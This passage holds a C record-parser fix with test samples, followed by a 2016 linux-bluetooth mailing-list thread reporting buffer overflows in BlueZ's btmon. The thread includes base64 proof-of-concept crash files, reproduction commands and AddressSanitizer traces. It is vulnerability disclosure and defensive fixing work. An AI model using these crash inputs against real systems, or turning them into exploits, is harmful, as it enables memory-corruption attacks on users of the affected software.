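static bool read_full(int fd, uint8_t *p, size_t n)
{
    while (n > 0) {
        ssize_t r = read(fd, p, n);
        if (r < 0 && errno == EINTR)
            continue;
        if (r <= 0)          /* error, or EOF before the record is complete */
            return false;
        p += (size_t)r;
        n -= (size_t)r;
    }
    return true;
}

/* Read one record into data[size]. The declared length is untrusted input
 * from the capture file and is compared with size before any read() into
 * data; that comparison is what the quoted pklg_read_hci snippet lacks. */
struct result read_record(int fd, uint8_t *data, size_t size)
{
    uint8_t hdr[HDR_LEN];
    ssize_t r = read(fd, hdr, sizeof hdr);
    if (r == 0)
        return fail(REC_EOF);          /* clean end of file */
    if (r < 0)
        return fail(REC_IO);
    if ((size_t)r < sizeof hdr &&
            !read_full(fd, hdr + r, sizeof hdr - (size_t)r))
        return fail(REC_BAD_HDR);      /* header cut short */
    uint32_t declared = ((uint32_t)hdr[0] << 24) | ((uint32_t)hdr[1] << 16) |
                        ((uint32_t)hdr[2] << 8) | hdr[3];
    if (declared < 1)                  /* must at least cover the type byte */
        return fail(REC_BAD_HDR);

    size_t toread = declared - 1;
    if (toread > size)                 /* would overrun data: refuse, read nothing */
        return fail(REC_TOO_LARGE);
    if (!read_full(fd, data, toread))
        return fail(REC_TRUNCATED);    /* file ends inside the payload */

    struct result ok = { REC_OK, hdr[4], (uint16_t)toread };
    return ok;
}

/* Write constructed bytes to a temporary file and parse one record through a
 * real file descriptor, so read() behaves as it would on a capture file. */
struct result run_case(const uint8_t *bytes, size_t n)
{
    struct result res = fail(REC_IO);
    uint8_t data[DATA_BUF];
    FILE *f = tmpfile();

    if (!f)
        return res;
    if (fwrite(bytes, 1, n, f) == n && fflush(f) == 0 &&
            lseek(fileno(f), 0, SEEK_SET) == 0)
        res = read_record(fileno(f), data, sizeof data);
    fclose(f);
    return res;
}

/* Constructed sample records (not the PoC files from the list). */
const uint8_t sample_ok[] = { 0x00, 0x00, 0x00, 0x04, 0x02, 0xde, 0xad, 0xbe };
/* Declares 4096 bytes, far beyond DATA_BUF: must be rejected before any read. */
const uint8_t sample_oversized[] = { 0x00, 0x00, 0x10, 0x00, 0x02, 0x01, 0x02 };
/* Declares 10 bytes but only 4 payload bytes follow. */
const uint8_t sample_truncated[] = { 0x00, 0x00, 0x00, 0x0a, 0x02,
                                     0x01, 0x02, 0x03, 0x04 };
const uint8_t sample_empty[1] = { 0 };
```

run_case(sample_ok, ...) yields REC_OK with type 0x02 and len 3; the oversized, truncated and empty samples yield REC_TOO_LARGE, REC_TRUNCATED and REC_EOF without ever writing past the 16-byte buffer.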
* Re: multiple buffer overflows and out-of-bound reads
2016-11-15 11:51 ` op7ic \x00
@ 2016-11-15 12:01 ` Johan Hedberg
2016-11-15 12:12 ` op7ic \x00
0 siblings, 1 reply; 8+ messages in thread
From: Johan Hedberg @ 2016-11-15 12:01 UTC (permalink / raw)
To: op7ic \x00
Cc: François Beaufort, Luiz Augusto von Dentz,
linux-bluetooth@vger.kernel.org
Hi op7ic,
Is there any chance that you could try to convert these to actual patches
to fix the issues?
Johan
On Tue, Nov 15, 2016, op7ic \x00 wrote:
> here are 4 crashes resulting in either out-of-bound reads or buffer
> overflows (see attached) but this time in btmon. They are pretty much
> similar to bugs reported previously.
>
> On Tue, Nov 15, 2016 at 10:51 AM, op7ic \x00 <op7ica@gmail.com> wrote:
> > I got a couple in btmon and I started looking at BO's in btmon too.
> >
> > FWIW whenever the code base is shared similar bugs will appear. You
> > notice that a lot of BO issues reported are for example due to
> > unchecked memcpy or just lack of boundary verification on arrays etc.
> > Once you hit that point the same bug appears.
> >
> >
> >
> >
> > On Tue, Nov 15, 2016 at 10:41 AM, François Beaufort
> > <beaufort.francois@gmail.com> wrote:
> >> FWIW, I have been witnessing btmon buffer overflows this morning but
> >> can't reproduce anymore.
> >>
> >> On Tue, Nov 15, 2016 at 10:25 AM, op7ic \x00 <op7ica@gmail.com> wrote:
> >>> alright will do - thanks for replying.
> >>>
> >>> On Tue, Nov 15, 2016 at 9:18 AM, Luiz Augusto von Dentz
> >>> <luiz.dentz@gmail.com> wrote:
> >>>> Hi,
> >>>>
> >>>> On Mon, Nov 14, 2016 at 7:06 PM, op7ic \x00 <op7ica@gmail.com> wrote:
> >>>>> Hello list,
> >>>>>
> >>>>> I have been playing with hcidump tool recently and came across
> >>>>> following bugs coming from either out-of-bound reads or buffer
> >>>>> overflows (see attached reports).
> >>>>>
> >>>>> There are couple more I`m working on and will send these later.
> >>>>
> >>>> I guess we want these to be tested against btmon, hcidump is deprecated.
> >>>>
> >>>> --
> >>>> Luiz Augusto von Dentz
^ permalink raw reply [flat|nested] 8+ messages in thread
* Re: multiple buffer overflows and out-of-bound reads
2016-11-15 12:01 ` Johan Hedberg
@ 2016-11-15 12:12 ` op7ic \x00
0 siblings, 0 replies; 8+ messages in thread
From: op7ic \x00 @ 2016-11-15 12:12 UTC (permalink / raw)
To: op7ic \x00, François Beaufort, Luiz Augusto von Dentz,
linux-bluetooth@vger.kernel.org
If I unclog my work pipeline a bit then potentially. I'll keep an eye
on proposing new patches for these reports at the end of my testing
cycle for bluez.
On Tue, Nov 15, 2016 at 12:01 PM, Johan Hedberg <johan.hedberg@gmail.com> wrote:
> Hi op7ic,
>
> Is there any chance that you could try to convert these to actual patches
> to fix the issues?
>
> Johan
>
> On Tue, Nov 15, 2016, op7ic \x00 wrote:
>> here are 4 crashes resulting in either out-of-bound reads or buffer
>> overflows (see attached) but this time in btmon. They are pretty much
>> similar to bugs reported previously.
>>
>> On Tue, Nov 15, 2016 at 10:51 AM, op7ic \x00 <op7ica@gmail.com> wrote:
>> > I got a couple in btmon and I started looking at BO's in btmon too.
>> >
>> > FWIW whenever the code base is shared similar bugs will appear. You
>> > notice that a lot of BO issues reported are for example due to
>> > unchecked memcpy or just lack of boundary verification on arrays etc.
>> > Once you hit that point same bug appears.
>> >
>> >
>> >
>> >
>> > On Tue, Nov 15, 2016 at 10:41 AM, François Beaufort
>> > <beaufort.francois@gmail.com> wrote:
>> >> FWIW, I have been witnessing btmon buffer overflows this morning but
>> >> can't reproduce anymore.
>> >>
>> >> On Tue, Nov 15, 2016 at 10:25 AM, op7ic \x00 <op7ica@gmail.com> wrote:
>> >>> alright will do - thanks for replying.
>> >>>
>> >>> On Tue, Nov 15, 2016 at 9:18 AM, Luiz Augusto von Dentz
>> >>> <luiz.dentz@gmail.com> wrote:
>> >>>> Hi,
>> >>>>
>> >>>> On Mon, Nov 14, 2016 at 7:06 PM, op7ic \x00 <op7ica@gmail.com> wrote:
>> >>>>> Hello list,
>> >>>>>
>> >>>>> I have been playing with hcidump tool recently and came across
>> >>>>> following bugs coming from either out-of-bound reads or buffer
>> >>>>> overflows (see attached reports).
>> >>>>>
>> >>>>> There are couple more I'm working on and will send these later.
>> >>>>
>> >>>> I guess we want these to be tested against btmon, hcidump is deprecated.
>> >>>>
>> >>>> --
>> >>>> Luiz Augusto von Dentz
>> >>> --
>> >>> To unsubscribe from this list: send the line "unsubscribe linux-bluetooth" in
>> >>> the body of a message to majordomo@vger.kernel.org
>> >>> More majordomo info at http://vger.kernel.org/majordomo-info.html
>
>> Machine: x86_64
>> OS: linux-gnu
>> Compiler: gcc
>> Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
>> Machine Type: x86_64-unknown-linux-gnu
>> BlueZ Version: 5.42
>> Release Status: release
>> Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz
>>
>> Description:
>>
>> A buffer overflow was identified in "l2cap_packet" function in "monitor/packet.c" source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash. To replicate this issue use the attached sample below and execute the following command:
>>
>> ./monitor/btmon -r <PoC File>
>>
>>
>> PoC.file base64 encoded:
>>
>> AAAAGAOEAAAAABAAAAMAEAkjChgAAwP7AgMDAxADEBAJIwoYAAMD+wIDAwMQAxAAAwMDAA==
>>
>>
>>
>> Affected code:
>>
>> 3161 index_list[index][in].frag_buf = malloc(len);
>> 3162 if (!index_list[index][in].frag_buf) {
>> 3163 print_text(COLOR_ERROR, "failed buffer allocation") ;
>> 3164 packet_hexdump(data, size);
>> 3165 return;
>> 3166 }
>> 3167
>> 3168 memcpy(index_list[index][in].frag_buf, data, size);
>> 3169 index_list[index][in].frag_pos = size;
>> 3170 index_list[index][in].frag_len = len - size;
>> 3171 index_list[index][in].frag_cid = cid;
>> 3172 break;
>>
>>
>>
>> Repeat-By:
>> echo <above base64> > PoC.b64
>> base64 -d PoC.b64 > PoC.file
>> valgrind ./monitor/btmon -r PoC.file
>>
>>
>> ASAN Report (bluez needs to be compiled with -fsanitize=address for this):
>>
>> =================================================================
>> ==27023==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x76cf40a9c2c2 at pc 0x679d7a177792 bp 0x76cf40a9b830 sp 0x76cf40a9aff0
>> READ of size 4095 at 0x76cf40a9c2c2 thread T0
>> < HCI Command: Unknown (0x00|0x0003) plen 16 [hci0] 0.004096
>> 09 23 0a 18 00 03 03 fb 02 03 03 03 .#..........
>> < ACL Data TX: Handle 771 flags 0x00 dlen 4099 [hci0] 94308888.197627
>> #0 0x679d7a177791 (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x2e791)
>> #1 0x4b9ecc in l2cap_packet monitor/l2cap.c:3168
>> #2 0x47dda6 in packet_hci_acldata monitor/packet.c:9115
>> #3 0x483777 in packet_monitor monitor/packet.c:3846
>> #4 0x417f68 in control_reader monitor/control.c:1415
>> #5 0x40a142 in main monitor/main.c:220
>> #6 0x679d79bb0b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
>> #7 0x40b03e (/opt/bluez/monitor/btmon+0x40b03e)
>>
>> Address 0x76cf40a9c2c2 is located in stack of thread T0 at offset 1778 in frame
>> #0 0x417b4f in control_reader monitor/control.c:1375
>>
>> This frame has 5 object(s):
>> [32, 34) 'pktlen'
>> [96, 98) 'index'
>> [160, 162) 'frequency'
>> [224, 240) 'tv'
>> [288, 1778) 'buf' <== Memory access at offset 1778 overflows this variable
>> HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
>> (longjmp and C++ exceptions *are* supported)
>> SUMMARY: AddressSanitizer: stack-buffer-overflow ??:0 ??
>> Shadow bytes around the buggy address:
>> 0x0eda6814b800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> 0x0eda6814b810: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> 0x0eda6814b820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> 0x0eda6814b830: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> 0x0eda6814b840: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> =>0x0eda6814b850: 00 00 00 00 00 00 00 00[02]f4 f3 f3 f3 f3 00 00
>> 0x0eda6814b860: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1
>> 0x0eda6814b870: f1 f1 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> 0x0eda6814b880: 00 00 f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00
>> 0x0eda6814b890: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> 0x0eda6814b8a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> Shadow byte legend (one shadow byte represents 8 application bytes):
>> Addressable: 00
>> Partially addressable: 01 02 03 04 05 06 07
>> Heap left redzone: fa
>> Heap right redzone: fb
>> Freed heap region: fd
>> Stack left redzone: f1
>> Stack mid redzone: f2
>> Stack right redzone: f3
>> Stack partial redzone: f4
>> Stack after return: f5
>> Stack use after scope: f8
>> Global redzone: f9
>> Global init order: f6
>> Poisoned by user: f7
>> Contiguous container OOB:fc
>> ASan internal: fe
>> ==27023==ABORTING
>
>> Machine: x86_64
>> OS: linux-gnu
>> Compiler: gcc
>> Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
>> Machine Type: x86_64-unknown-linux-gnu
>> BlueZ Version: 5.42
>> Release Status: release
>> Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz
>>
>> Description:
>>
>> An out-of-bound read was identified in "packet_hexdump" function in "monitor/packet.c" source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash. To replicate this issue use the attached sample below and execute the following command:
>>
>> ./monitor/btmon -r <PoC File>
>>
>>
>> PoC.file base64 encoded:
>> AACACQQHGAAaERDoAwAAAAkjBxgAAwMDAwMDAwMDAwMDAwMDAwMDAw==
>>
>>
>> Affected code:
>>
>> 3736 static const char hexdigits[] = "0123456789abcdef";
>> 3737 char str[68];
>> 3738 uint16_t i;
>> 3739
>> 3740 if (!len)
>> 3741 return;
>> 3742
>> 3743 for (i = 0; i < len; i++) {
>> 3744 str[((i % 16) * 3) + 0] = hexdigits[buf[i] >> 4];
>> 3745 str[((i % 16) * 3) + 1] = hexdigits[buf[i] & 0xf];
>> 3746 str[((i % 16) * 3) + 2] = ' ';
>>
>>
>>
>> Repeat-By:
>> echo <above base64> > PoC.b64
>> base64 -d PoC.b64 > PoC.file
>> valgrind ./monitor/btmon -r PoC.file
>>
>>
>> ASAN Report (bluez needs to be compiled with -fsanitize=address for this):
>>
>> ==13306==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x79fe1636c7e2 at pc 0x42cb3c bp 0x79fe1636bca0 sp 0x79fe1636bc98
>> READ of size 1 at 0x79fe1636c7e2 thread T0
>> > ACL Data RX: Handle 0 flags 0x00 dlen 2304 [hci0] 0.437326056
>> invalid packet size (32764 != 2304)
>> 23 07 18 00 03 03 03 03 03 03 03 03 03 03 03 03 #...............
>> 03 03 03 03 03 03 03 00 00 00 00 00 20 08 82 40 ............ ..@
>> 00 28 80 20 00 00 00 00 40 01 40 23 00 00 00 00 .(. ....@.@#....
>> a0 04 20 00 00 00 00 00 00 04 00 80 00 00 00 00 .. .............
>> 00 00 10 04 ff ff ff ff 04 01 04 86 9a 39 1c 20 .............9.
>> 54 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Tp..............
>> 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ................
>> ff ff ff ff 04 00 00 00 4c 00 00 00 00 00 00 00 ........L.......
>> 00 00 00 00 9a 39 1c 20 54 70 00 00 00 00 00 00 .....9. Tp......
>> 00 00 00 00 56 98 54 00 00 00 00 00 80 c8 36 00 ....V.T.......6.
>> 00 00 00 00 1b 00 00 00 00 00 00 00 59 98 54 00 ............Y.T.
>> 00 00 00 00 00 80 81 21 54 70 00 00 a2 e5 32 1f .......!Tp....2.
>> 54 70 00 00 62 53 61 21 54 70 00 00 00 00 00 00 Tp..bSa!Tp......
>> 00 00 00 00 74 78 61 21 54 70 00 00 80 c5 36 16 ....txa!Tp....6.
>> fe 79 00 00 00 b0 82 21 54 70 00 00 00 00 00 00 .y.....!Tp......
>> 00 00 00 00 08 00 00 00 30 00 00 00 50 c8 36 16 ........0...P.6.
>> fe 79 00 00 90 c7 36 16 fe 79 00 00 50 f8 1d 20 .y....6..y..P..
>> 54 70 00 00 a0 e2 51 20 54 70 00 00 00 00 00 00 Tp....Q Tp......
>> 00 00 00 00 00 00 00 00 00 00 00 00 18 c8 36 16 ..............6.
>> fe 79 00 00 17 c8 36 16 fe 79 00 00 34 c3 36 16 .y....6..y..4.6.
>> fe 79 00 00 00 00 00 00 00 00 00 00 00 00 00 91 .y..............
>> 6d 2c fc f3 01 00 00 00 00 00 00 00 80 c5 36 16 m,............6.
>> fe 79 00 00 00 80 81 21 54 70 00 00 a2 e5 32 1f .y.....!Tp....2.
>> 54 70 00 00 00 00 e0 85 6d 2c fc f3 00 00 c2 f0 Tp......m,......
>> c2 42 a8 e0 00 00 00 00 00 00 00 00 80 c5 36 16 .B............6.
>> fe 79 00 00 b8 79 82 21 54 70 00 00 51 45 52 20 .y...y.!Tp..QER
>> 54 70 00 00 00 00 40 86 6d 2c fc f3 00 00 c2 f0 Tp....@.m,......
>> c2 42 a8 e0 06 00 00 00 00 00 00 00 80 c5 36 16 .B............6.
>> fe 79 00 00 05 16 62 21 54 70 00 00 89 53 74 20 .y....b!Tp...St
>> 54 70 00 00 c8 86 81 21 54 70 00 00 01 00 00 00 Tp.....!Tp......
>> 00 00 00 00 80 c8 36 16 fe 79 00 00 98 86 81 21 ......6..y.....!
>> 54 70 00 00 9b 5b 61 21 54 70 00 00 00 00 01 00 Tp...[a!Tp......
>> 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 ................
>> 01 00 00 00 35 63 61 21 54 70 00 00 01 00 00 00 ....5ca!Tp......
>> fe 79 00 00 00 80 81 21 54 70 00 00 00 00 00 00 .y.....!Tp......
>> 00 00 00 00 28 ea 9c 20 54 70 00 00 68 0a 73 20 ....(.. Tp..h.s
>> 54 70 00 00 b5 55 61 21 54 70 00 00 01 00 00 00 Tp...Ua!Tp......
>> fe 79 00 00 d8 99 81 21 54 70 00 00 30 c4 36 16 .y.....!Tp..0.6.
>> fe 79 00 00 1c 1c 61 21 54 70 00 00 a8 e8 9c 20 .y....a!Tp.....
>> 54 70 00 00 1c 1c 61 21 54 70 00 00 03 00 00 00 Tp....a!Tp......
>> 00 00 00 00 2e 03 31 1c 00 00 00 00 03 00 00 00 ......1.........
>> 00 00 00 00 0b 00 00 00 00 00 00 00 f8 86 81 21 ...............!
>> 54 70 00 00 8e 25 61 21 54 70 00 00 28 bd 17 20 Tp...%a!Tp..(..
>> 54 70 00 00 00 c5 36 16 fe 79 00 00 28 bd 17 20 Tp....6..y..(..
>> 54 70 00 00 48 c1 17 20 54 70 00 00 10 c6 36 16 Tp..H.. Tp....6.
>> fe 79 00 00 0c c4 70 00 00 00 00 00 00 c6 36 16 .y....p.......6.
>> fe 79 00 00 80 87 81 21 54 70 00 00 00 00 00 00 .y.....!Tp......
>> 00 00 00 00 80 87 81 21 54 70 00 00 00 a0 81 21 .......!Tp.....!
>> 54 70 00 00 04 14 40 00 00 00 00 00 78 8d 18 20 Tp....@.....x..
>> 54 70 00 00 70 0a 40 00 00 00 00 00 00 00 00 00 Tp..p.@.........
>> 01 00 00 00 2c 00 00 00 01 00 00 00 90 c6 36 16 ....,.........6.
>> fe 79 00 00 80 87 81 21 54 70 00 00 a0 c6 36 16 .y.....!Tp....6.
>> fe 79 00 00 00 b5 82 21 54 70 00 00 c8 c6 36 16 .y.....!Tp....6.
>> fe 79 00 00 a8 b1 82 21 54 70 00 00 01 00 00 00 .y.....!Tp......
>> 00 00 00 00 3d 27 61 21 54 70 00 00 00 00 00 00 ....='a!Tp......
>> 00 00 00 00 80 87 81 21 54 70 00 00 01 00 00 00 .......!Tp......
>> 54 70 00 00 00 00 00 00 00 00 00 00 01 00 00 00 Tp..............
>> 00 00 00 00 a8 b1 82 21 54 70 00 00 03 00 00 00 .......!Tp......
>> 00 00 00 00 0b 00 00 00 00 00 00 00 f8 86 81 21 ...............!
>> 54 70 00 00 8e 25 61 21 54 70 00 00 00 00 00 00 Tp...%a!Tp......
>> 00 00 00 00 00 b5 82 21 54 70 00 00 10 c6 36 16 .......!Tp....6.
>> fe 79 00 00 00 c6 36 16 fe 79 00 00 2e 03 31 1c .y....6..y....1.
>> 00 00 00 00 04 14 40 00 00 00 00 00 ff ff ff ff ......@.........
>> 00 00 00 00 20 0f 40 00 00 00 00 00 48 c1 17 20 .... .@.....H..
>> 54 70 00 00 00 a0 81 21 54 70 00 00 00 a0 81 21 Tp.....!Tp.....!
>> 54 70 00 00 da 15 40 00 00 00 00 00 78 8d 18 20 Tp....@.....x..
>> 54 70 00 00 38 03 40 00 00 00 00 00 00 00 00 00 Tp..8.@.........
>> 01 00 00 00 54 02 00 00 01 00 00 00 01 00 00 00 ....T...........
>> 00 00 00 00 80 87 81 21 54 70 00 00 b0 c7 36 16 .......!Tp....6.
>> fe 79 00 00 00 b5 82 21 54 70 00 00 d8 c7 36 16 .y.....!Tp....6.
>> fe 79 00 00 e8 56 7d 00 00 00 00 00 00 00 00 00 .y...V}.........
>> 00 00 00 00 00 00 00 00 00 00 00 00 f0 ef 00 00 ................
>> 20 60 00 00 00 00 00 00 00 00 00 00 00 c8 36 16 `............6.
>> fe 79 00 00 c7 6d 61 21 54 70 00 00 01 00 00 00 .y...ma!Tp......
>> : #0 0x42cb3b in packet_hexdump monitor/packet.c:3744
>> #1 0x47dd2b in packet_hexdump monitor/packet.c:3740
>> #2 0x47dd2b in packet_hci_acldata monitor/packet.c:9108
>> #3 0x483752 in packet_monitor monitor/packet.c:3849
>> #4 0x417f68 in control_reader monitor/control.c:1415
>> #5 0x40a142 in main monitor/main.c:220
>> #6 0x705420199b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
>> #7 0x40b03e (/opt/bluez/monitor/btmon+0x40b03e)
>>
>> Address 0x79fe1636c7e2 is located in stack of thread T0 at offset 1778 in frame
>> #0 0x417b4f in control_reader monitor/control.c:1375
>>
>> This frame has 5 object(s):
>> [32, 34) 'pktlen'
>> [96, 98) 'index'
>> [160, 162) 'frequency'
>> [224, 240) 'tv'
>> [288, 1778) 'buf' <== Memory access at offset 1778 overflows this variable
>> HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
>> (longjmp and C++ exceptions *are* supported)
>> SUMMARY: AddressSanitizer: stack-buffer-overflow monitor/packet.c:3744 packet_hexdump
>> Shadow bytes around the buggy address:
>> 0x0f4042c658a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> 0x0f4042c658b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> 0x0f4042c658c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> 0x0f4042c658d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> 0x0f4042c658e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> =>0x0f4042c658f0: 00 00 00 00 00 00 00 00 00 00 00 00[02]f4 f3 f3
>> 0x0f4042c65900: f3 f3 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> 0x0f4042c65910: 00 00 f1 f1 f1 f1 00 00 00 00 00 00 00 00 00 00
>> 0x0f4042c65920: 00 00 00 00 00 00 f3 f3 f3 f3 00 00 00 00 00 00
>> 0x0f4042c65930: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> 0x0f4042c65940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> Shadow byte legend (one shadow byte represents 8 application bytes):
>> Addressable: 00
>> Partially addressable: 01 02 03 04 05 06 07
>> Heap left redzone: fa
>> Heap right redzone: fb
>> Freed heap region: fd
>> Stack left redzone: f1
>> Stack mid redzone: f2
>> Stack right redzone: f3
>> Stack partial redzone: f4
>> Stack after return: f5
>> Stack use after scope: f8
>> Global redzone: f9
>> Global init order: f6
>> Poisoned by user: f7
>> Contiguous container OOB:fc
>> ASan internal: fe
>> ==13306==ABORTING
>>
>
>> Machine: x86_64
>> OS: linux-gnu
>> Compiler: gcc
>> Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
>> Machine Type: x86_64-unknown-linux-gnu
>> BlueZ Version: 5.42
>> Release Status: release
>> Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz
>>
>> Description:
>>
>> A buffer overflow was observed in "pklg_read_hci" function in "btsnoop.c" source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash. To replicate this issue use the attached sample below and execute the following command:
>>
>> ./monitor/btmon -r <PoC File>
>>
>>
>>
>> PoC.file base64 encoded:
>>
>> AAAQABkQAKLNFQCAAgICFwIXAAEABU5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5O
>> Tk5OTqGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGh
>> oU5OTk5OTk5OTk5OTk5dTgAAdXV1dXV1dXV1dXV1dXV1MyQ+Plj7AbrYA4QBABIgPj08Gjq6AAME
>> AQC62AMEAQAwPkc+WgABABAD3AEAPgAEGj4uPrrYEgQBAIw+Pk1YGj66AAMEAQAAkI+PAECPlNOA
>> AAEAEj5NPlgC/4AA9gQBABI+PgEAAAC6AAMEAT4+AQAAALoAAwQB/3///z5YAAEfAA7mAQA+CAQa
>> Pho+utgDBAEAMD4+PlgAAR8AA+YBAD4ABBY+QD7//wMEAQAFPj49WAY+uugDBPUAEj4+PlgaPrrY
>> AwQBACKdAAAYGj66AAMEAQASJD4+WBo+utgDBAEA/38AAAwaPgAAAAEBADMkPj5YAAG62AOEAQAS
>> ID49PBo6ugADBAEAutgDBAEAMD5HPloAAQAQA9wBAD4ABBo+Lj66ABAfAAPmAQABAAQWcHBwcHBw
>> cP//f/9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT71PT09PT4D/T09PT09PD09P
>> T09PT09PT09PT09PT09PT09PT09PT09PT09RT09PUk9PT09PT09PT09PT09PT0////8ABAkEAiAA
>> KgUZEACizRUVNAICABI+PgEAAAC6CQMEAf9///8+WAABHwAO5gEAPggEGj4aPrrYAwQBAE0+Pj5Y
>> AAEfAAPmAQA+AAQWPkA+//8DBAEABT4+PVgGPrroAwT1ABI+Pj5YGj662AMEAQBDnQAAAQA+CAQa
>> Pho+utgDBAEAMD4+PlgAAR8AA+YBAD4ABBY+QD7//wMEAQAFPj49WAY+uugDBPUAEj4+PlgaPrrY
>> AwQBAEOdAAAYGj66AAMEAQASJD4+WBo+utgDBAEA/38AAAwaPgAAAAEBABgaProAAwQBABIkPj5Y
>> Gj662AMEAQD/fwAADBo+AAAAAQEAMyQ+PlgAAbrYA4QBABIgPj08Gjq6AAMEDwC62AMEAQAwPkc+
>> WgABABwD3AEAPgAEGj4uPrrYEgQBAIw+Pk1YGj66AAMEAQAAkI+PAEBPT09PT09PT09PT09PT09P
>> T09PT09PT08DhAEAEiA+PTwaOroAAwQBALrYAwQBADA+Rz5aAAEAEAPcAQA+j5TTgAABABI+TT5Y
>> Av+AAPYEAQASPj4BAAAAugADBAEAED4+PlgWAR8ADuYBAD4IBBo+Gj662E5OTk5OTk5dTk51dXV1
>> dXV1dXV1dXV1dXV1dXV1dXV1dXVOTk5OTk5OTk5OTk5OTk5OTk5OTugLAAAC////fwIXAAGA////
>> AAQJBAIgACoFGRAAnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ1AnZ2dnZ2dnZ2dnZ2dnZ2dnZ2d
>> nZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ0AAAC6AAMEAQAQPj4+WAABH09PT09P
>> T09PT08PT09PT09PT09PT09PT09PT09PT09PT3BwcHBwcJJwcHBwiHBwcHDucHBwcHBwcHBwcHBw
>> cHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwEHBwcHBwcHBwcHBwcHBwcHBwT3Bw
>> cAIgACoFGRAAos0VFTQCAgAgPj4BAAAAugADBAH/f///PlgAAR8ADuYBAD4IBHBwPgAZGj5wcHBw
>> cHBgcHBwcHBwcHBwcHBwQHBwcHBwcHBwGj662BIEAQCMPj5NWBoADuYBAD4IBHBwPgAZGj5wcHBw
>> cHBgcHBwcHBwcHBwcHBwQHBwcHBwcHBwGj662BIEAQCMPj5NWBo+ugADBAEAEiA+Plj///9/EAQB
>> ABI+TVgGProAAwQBABI+Pj5YJAAQQA==
>>
>>
>>
>> Affected code:
>>
>> 368 *index = 0xffff;
>> 369 *opcode = 0xffff;
>> 370 break;
>> 371 }
>> 372
>> 373 len = read(btsnoop->fd, data, toread);
>> 374 if (len < 0) {
>> 375 btsnoop->aborted = true;
>> 376 return false;
>> 377 }
>>
>>
>>
>> Repeat-By:
>> echo <above base64> > PoC.b64
>> base64 -d PoC.b64 > PoC.file
>> valgrind ./monitor/btmon -r PoC.file
>>
>>
>> ASAN Report (bluez needs to be compiled with -fsanitize=address for this):
>>
>> =================================================================
>> ==1986==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x73f4d87b94c2 at pc 0x663b1aef59b6 bp 0x73f4d87b8c50 sp 0x73f4d87b8c38
>> WRITE of size 1491 at 0x73f4d87b94c2 thread T0
>> #0 0x663b1aef59b5 in read (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x299b5)
>> #1 0x544a17 in pklg_read_hci src/shared/btsnoop.c:373
>> #2 0x544a17 in btsnoop_read_hci src/shared/btsnoop.c:433
>> #3 0x417efd in control_reader monitor/control.c:1408
>> #4 0x40a142 in main monitor/main.c:220
>> #5 0x663b1a933b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
>> #6 0x40b03e (/opt/bluez/monitor/btmon+0x40b03e)
>>
>> Address 0x73f4d87b94c2 is located in stack of thread T0 at offset 1778 in frame
>> #0 0x417b4f in control_reader monitor/control.c:1375
>>
>> This frame has 5 object(s):
>> [32, 34) 'pktlen'
>> [96, 98) 'index'
>> [160, 162) 'frequency'
>> [224, 240) 'tv'
>> [288, 1778) 'buf' <== Memory access at offset 1778 overflows this variable
>> HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
>> (longjmp and C++ exceptions *are* supported)
>> SUMMARY: AddressSanitizer: stack-buffer-overflow ??:0 read
>> Shadow bytes around the buggy address:
>> 0x0e7f1b0ef240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> 0x0e7f1b0ef250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> 0x0e7f1b0ef260: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> 0x0e7f1b0ef270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
